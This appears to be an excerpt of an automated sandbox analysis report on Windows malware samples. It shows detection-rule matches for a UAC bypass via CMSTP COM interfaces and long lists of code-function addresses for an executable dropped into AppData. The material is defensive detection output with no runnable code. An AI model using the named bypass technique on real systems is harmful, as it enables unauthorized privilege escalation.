                  Source: 17.2.cmd.exe.4d706cd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.cmd.exe.5082acd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.UploadAlt_Ti.exe.265da20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.cmd.exe.50836cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653734050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEB8_2_00007FF653734050
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE4050 ?setAttribute@QCoreApplication@@SAXW4ApplicationAttribute@Qt@@_N@Z,??0QApplication@@QEAA@AEAHPEAPEADH@Z,?applicationDirPath@QCoreApplication@@SA?AVQString@@XZ,?toNativeSeparators@QDir@@SA?AVQString@@AEBV2@@Z,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??0QByteArray@@QEAA@AEBV0@@Z,?fromUtf8@QString@@SA?AV1@PEBDH@Z,?append@QString@@QEAAAEAV1@AEBV1@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromLocal8Bit@QString@@SA?AV1@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,??0QChar@@QEAA@UQLatin1Char@@@Z,?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?toUpper@QString@@QEGBA?AV1@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,?remove@QString@@QEAAAEAV1@HH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z,??1QString@@QEAA@XZ,??1QString@@QEAA@XZ,??4QString@@QEAAAEAV0@AEBV0@@Z,?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z,?indexOf@QString@@QEBAHAE10_2_00007FF6B1FE4050
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00404FAA6_2_00404FAA
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_0041206B6_2_0041206B
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_0041022D6_2_0041022D
                  Source: C:\Users\user\Desktop\TVr2Z822J3.exeCode function: 6_2_00411F916_2_00411F91
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537674C08_2_00007FF6537674C0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374D4F08_2_00007FF65374D4F0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537433E08_2_00007FF6537433E0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537352608_2_00007FF653735260
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65372D2208_2_00007FF65372D220
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D1408_2_00007FF65371D140
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374D1878_2_00007FF65374D187
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65375B1A08_2_00007FF65375B1A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D8CE8_2_00007FF65371D8CE
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537238F08_2_00007FF6537238F0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D8F48_2_00007FF65371D8F4
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D9128_2_00007FF65371D912
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D8488_2_00007FF65371D848
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D8668_2_00007FF65371D866
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D8A08_2_00007FF65371D8A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537397508_2_00007FF653739750
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537657508_2_00007FF653765750
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374D7908_2_00007FF65374D790
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65375D7908_2_00007FF65375D790
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374F6C08_2_00007FF65374F6C0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374B5C08_2_00007FF65374B5C0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653711D308_2_00007FF653711D30
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653749D308_2_00007FF653749D30
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653757BC08_2_00007FF653757BC0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65373BC008_2_00007FF65373BC00
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DB5B8_2_00007FF65371DB5B
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653747BB08_2_00007FF653747BB0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DAD68_2_00007FF65371DAD6
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653753AF08_2_00007FF653753AF0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653721B008_2_00007FF653721B00
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DB0B8_2_00007FF65371DB0B
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653715B308_2_00007FF653715B30
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DB348_2_00007FF65371DB34
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DA488_2_00007FF65371DA48
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653725A708_2_00007FF653725A70
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DA828_2_00007FF65371DA82
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DAB08_2_00007FF65371DAB0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D9BC8_2_00007FF65371D9BC
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D9F68_2_00007FF65371D9F6
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371DA1C8_2_00007FF65371DA1C
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D9388_2_00007FF65371D938
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537379608_2_00007FF653737960
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D9648_2_00007FF65371D964
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537359808_2_00007FF653735980
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371D9828_2_00007FF65371D982
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537559908_2_00007FF653755990
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65376B9B08_2_00007FF65376B9B0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537340508_2_00007FF653734050
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537240A08_2_00007FF6537240A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653727FD08_2_00007FF653727FD0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653737FF08_2_00007FF653737FF0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653715F608_2_00007FF653715F60
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653725FA08_2_00007FF653725FA0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653739F208_2_00007FF653739F20
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374BDD08_2_00007FF65374BDD0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653755E308_2_00007FF653755E30
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65375C5008_2_00007FF65375C500
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537244408_2_00007FF653724440
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537623D08_2_00007FF6537623D0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65375E3D08_2_00007FF65375E3D0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537684308_2_00007FF653768430
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374A2508_2_00007FF65374A250
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537662608_2_00007FF653766260
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371A1408_2_00007FF65371A140
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537308C08_2_00007FF6537308C0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374E8508_2_00007FF65374E850
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537588808_2_00007FF653758880
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537368908_2_00007FF653736890
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537248A08_2_00007FF6537248A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537268108_2_00007FF653726810
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537648308_2_00007FF653764830
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537526F78_2_00007FF6537526F7
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65372C7008_2_00007FF65372C700
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537287208_2_00007FF653728720
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537326608_2_00007FF653732660
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537305C08_2_00007FF6537305C0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371A6208_2_00007FF65371A620
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537185A08_2_00007FF6537185A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653768CC08_2_00007FF653768CC0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653712D308_2_00007FF653712D30
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653738C608_2_00007FF653738C60
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65373CC908_2_00007FF65373CC90
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653754CA08_2_00007FF653754CA0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65371EBE08_2_00007FF65371EBE0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653720AE08_2_00007FF653720AE0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653760B108_2_00007FF653760B10
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653714A908_2_00007FF653714A90
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653728A008_2_00007FF653728A00
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374AA008_2_00007FF65374AA00
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653766A108_2_00007FF653766A10
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65372E9A08_2_00007FF65372E9A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65373D0B08_2_00007FF65373D0B0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65373AFC08_2_00007FF65373AFC0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653728FF08_2_00007FF653728FF0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537510308_2_00007FF653751030
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF6537670308_2_00007FF653767030
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65372AF408_2_00007FF65372AF40
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF65374EF408_2_00007FF65374EF40
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653752DC08_2_00007FF653752DC0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FF653736DA08_2_00007FF653736DA0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC8E4308_2_00007FFB0BC8E430
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC893A08_2_00007FFB0BC893A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC863C88_2_00007FFB0BC863C8
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC95BC08_2_00007FFB0BC95BC0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC9AB208_2_00007FFB0BC9AB20
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7EB408_2_00007FFB0BC7EB40
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC972FC8_2_00007FFB0BC972FC
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC912A08_2_00007FFB0BC912A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC94AD08_2_00007FFB0BC94AD0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC8D2808_2_00007FFB0BC8D280
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7DA208_2_00007FFB0BC7DA20
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC96A488_2_00007FFB0BC96A48
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCAAA0C8_2_00007FFB0BCAAA0C
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7C9208_2_00007FFB0BC7C920
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCB01568_2_00007FFB0BCB0156
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC928F08_2_00007FFB0BC928F0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC8C1108_2_00007FFB0BC8C110
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC860708_2_00007FFB0BC86070
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC898508_2_00007FFB0BC89850
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCA2FF08_2_00007FFB0BCA2FF0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC8AFA08_2_00007FFB0BC8AFA0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC867488_2_00007FFB0BC86748
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC94F108_2_00007FFB0BC94F10
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC826A08_2_00007FFB0BC826A0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC946908_2_00007FFB0BC94690
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCA66808_2_00007FFB0BCA6680
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCABE288_2_00007FFB0BCABE28
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC9B5B08_2_00007FFB0BC9B5B0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCA9D388_2_00007FFB0BCA9D38
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCAC5208_2_00007FFB0BCAC520
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC90D408_2_00007FFB0BC90D40
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCA34F88_2_00007FFB0BCA34F8
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCA4D008_2_00007FFB0BCA4D00
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7B4B88_2_00007FFB0BC7B4B8
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BC7FCD08_2_00007FFB0BC7FCD0
                  Source: C:\Users\user\ActiveISO.exeCode function: 8_2_00007FFB0BCA54D08_2_00007FFB0BCA54D0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FF33E010_2_00007FF6B1FF33E0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B20174C010_2_00007FF6B20174C0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFD4F010_2_00007FF6B1FFD4F0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD14010_2_00007FF6B1FCD140
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFD18710_2_00007FF6B1FFD187
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200B1A010_2_00007FF6B200B1A0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FDD22010_2_00007FF6B1FDD220
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE526010_2_00007FF6B1FE5260
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B201575010_2_00007FF6B2015750
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE975010_2_00007FF6B1FE9750
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200D79010_2_00007FF6B200D790
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFD79010_2_00007FF6B1FFD790
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD84810_2_00007FF6B1FCD848
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD86610_2_00007FF6B1FCD866
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD8A010_2_00007FF6B1FCD8A0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD8CE10_2_00007FF6B1FCD8CE
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD8F410_2_00007FF6B1FCD8F4
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FD38F010_2_00007FF6B1FD38F0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD91210_2_00007FF6B1FCD912
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFB5C010_2_00007FF6B1FFB5C0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FFF6C010_2_00007FF6B1FFF6C0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCDB5B10_2_00007FF6B1FCDB5B
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FF7BB010_2_00007FF6B1FF7BB0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B2007BC010_2_00007FF6B2007BC0
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FEBC0010_2_00007FF6B1FEBC00
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FC1D3010_2_00007FF6B1FC1D30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FF9D3010_2_00007FF6B1FF9D30
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD93810_2_00007FF6B1FCD938
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD96410_2_00007FF6B1FCD964
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE796010_2_00007FF6B1FE7960
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FCD98210_2_00007FF6B1FCD982
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B1FE598010_2_00007FF6B1FE5980
                  Source: C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exeCode function: 10_2_00007FF6B200599010_2_00007FF6B2005990
